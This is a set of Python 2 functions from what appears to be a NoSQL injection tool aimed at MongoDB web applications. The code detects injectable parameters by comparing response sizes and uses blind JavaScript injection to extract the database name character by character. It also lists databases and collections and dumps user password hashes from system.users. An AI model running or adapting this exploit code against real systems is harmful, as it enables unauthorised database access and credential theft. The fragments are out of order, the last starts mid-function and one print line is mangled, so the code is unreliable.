def checkResult(baseSize, injectSize, testNum, postData): global validAddrs #有效 global possAddrs global httpMethod global neDict global gtDict delta = abs(baseSize - injectSize) if (delta >= 100) and (injectSize != 0): printInfoMsg( '[*] Response varied %s bytes from random parameter value! Injection works!' % delta) if httpMethod == 'GET': validAddrs.append(urlArray[testNum]) else: if testNum == 1: validAddrs.append(str(neDict)) elif testNum == 2: validAddrs.append(str(gtDict)) else: validAddrs.append(str(postData)) if testNum == 2 or testNum == 4: lt24 = True str24 = True elif testNum == 3 or testNum == 5: lt24 = True int24 = True return elif (delta < 100) and (delta > 0) and (injectSize != 0): print '[*] Response variance was only %s bytes. Injection returned a MongoDB Error. Injection may be possible.' % delta if httpMethod == 'GET': possAddrs.append(urlArray[testNum]) else: if testNum == 1: possAddrs.append(str(neDict)) else: possAddrs.append(str(postData)) return elif delta == 0: print '[*] Injection did not work.' return else: print '[*] Injected response was smaller than random response. Injection may be possible.' if httpMethod == 'GET': possAddrs.append(urlArray[testNum]) else: if testNum == 1: possAddrs.append(str(neDict)) else: possAddrs.append(str(postData)) return
def displayDBS(conn): try: printInfoMsg('[+] List of databases:') for db in conn.database_names(): print ' %s' % db print '\n' except: printErrMsg('[Error] Couldn\'t list databases.') try: for dbname in conn.database_names(): db = conn[dbname] printInfoMsg('[+] DBname: %s' % dbname) colls = db.collection_names(include_system_collections=False) printInfoMsg('[+] %s Collections:' % dbname) for coll in colls: print ' %s' % coll print '\n' if 'system.users' in db.collection_names(): users = list(db.system.users.find()) printInfoMsg('[+] Database User and Password hash:') try: for x in range(0, len(users)): print " Username: "******" Hash: " + users[x]['pwd'] print "\n" except Exception, e: printErrMsg('[Error] %s, couldn\'t list user or hash\n' % e) continue except Exception, e: printErrMsg('[Error] %s, Couldn\'t list collections.\n' % e)
def getDBInfo(): getDBnameLen = False getDBname = False DBnameLen = 0 nameCount = 0 charCount = 0 dbName = '' chars = string.ascii_letters + string.digits trueUrl = urlArray[11].replace("---", "return true; var v ='!" + "&") req = requests.get(urlArray[11], headers=HEADERS) baseLen = int(len(req.content)) print '[*] Calculating the length of the database name.' while getDBnameLen == False: calcUrl = urlArray[11].replace( "---", "if(db.getName().length==%s) {return true;} var v='a&" % DBnameLen) req = requests.get(calcUrl) UrlLen = int(len(req.content)) if UrlLen == baseLen: print '[*] Got database name length of %s characters.' % DBnameLen getDBnameLen = True else: DBnameLen += 1 printInfoMsg('[+] Database name is: '), while getDBname == False: calcUrl = urlArray[11].replace( "---", "if(db.getName()[%s]==chars[%s]){return true;} var v='a&" % (nameCount, charCount)) req = requests.get(calcUrl) UrlLen = int(len(req.content)) if UrlLen == baseLen: dbName += chars[charCount] print dbName, nameCount += 1 charCount = 0 if nameCount == DBnameLen: getDBname = True else: charCount += 1
def postWeb(reqFile): print '[*] Start web app attacks (POST)' global testNum testNum = 1 global httpMethod httpMethod = 'POST' global possAddrs possAddrs = [] global validAddrs validAddrs = [] global addedTarget addedTarget = dict() global paramNames paramNames = [] global paramValues paramValues = [] appUp = False strAttack = False intAttack = False checkFile(reqFile) try: with openFile(reqFile, 'rb') as f: content = f.read() except: printErrMsg( '[Error] Something went wrong while trying to read the content of file \'%s\'' % reqFile) return parseBurpLog(content) if not addedTarget['url'] or not addedTarget['data']: printErrMsg( '[Error] Unable to find usable request(s), in provided file (\'%s\')' % reqFile) return print '[*] Testing connection to the target URL.' url = addedTarget['url'] buildPostdata(url, addedTarget['data']) printInfoMsg('[+] Valid URLs:') for url in validAddrs: printInfoMsg(' %s' % url) print '\n ' printInfoMsg('[+] Possible URLs:') for url in possAddrs: printInfoMsg(' %s' % url)
def buildUrl(url, value): global urlArray urlArray = ['', '', '', '', '', '', '', '', '', '', '', ''] paramNames = [] paramValues = [] injectParams = [] try: split_url = url.split('?') params = split_url[1].split('&') except: printErrMsg( '[Error] Not able to parse the URL and parameters. Check the url') return for item in params: index = item.find('=') paramNames.append(item[0:index]) paramValues.append(item[index + 1:len(item)]) printInfoMsg('[+] List of parameters:') index = 1 for name in paramNames: print ' [%s] %s' % (index, name) index += 1 try: injectIndex = getQuesMsg( '[*] Choose parmeters to inject (such as 1,2,3):') #print injectIndex.split(',') for i in injectIndex.split(','): injectParams.append(paramNames[int(i) - 1]) except Exception, e: printErrMsg('[Error] %s. Somthing wrong... Check inject parmeters.' % e) return
def displayInfo(conn): printInfoMsg('[+] Server Info:') print ' MongoDB Version:', conn.server_info()['version'] print ' Debugs enabled:', str(conn.server_info()['debug']) print ' Platform:', str(conn.server_info()['bits']) + ' bits' print '\n'
reqTime = round((end - start), 3) print '[*] App is up, got response length of %s' % resLength else: printErrMsg('[Error] Got %s from the app, check your options.' % req.status_code) return except Exception, e: printErrMsg( '[Error] %s. Looks like the server didn\'t respond. Check your options.' % e) return if appUp == True: index = 1 printInfoMsg('[+] List of post params:') for params in postParams: print ' [%s] %s' % (index, params) index += 1 try: injectIndex = getQuesMsg('Choose a parmeter to inject: ') injOpt = postParams.keys()[int(injectIndex) - 1] except Exception, e: printErrMsg( '[Error] %s. Somthing wrong... Check inject parmeters.' % e) return injectSize = getQuesMsg('[*] Input test random string size: ') injectstr = getInjectStr(int(injectSize)) postParams[injOpt] = injectstr req = requests.post(url, data=postParams, headers=HEADERS)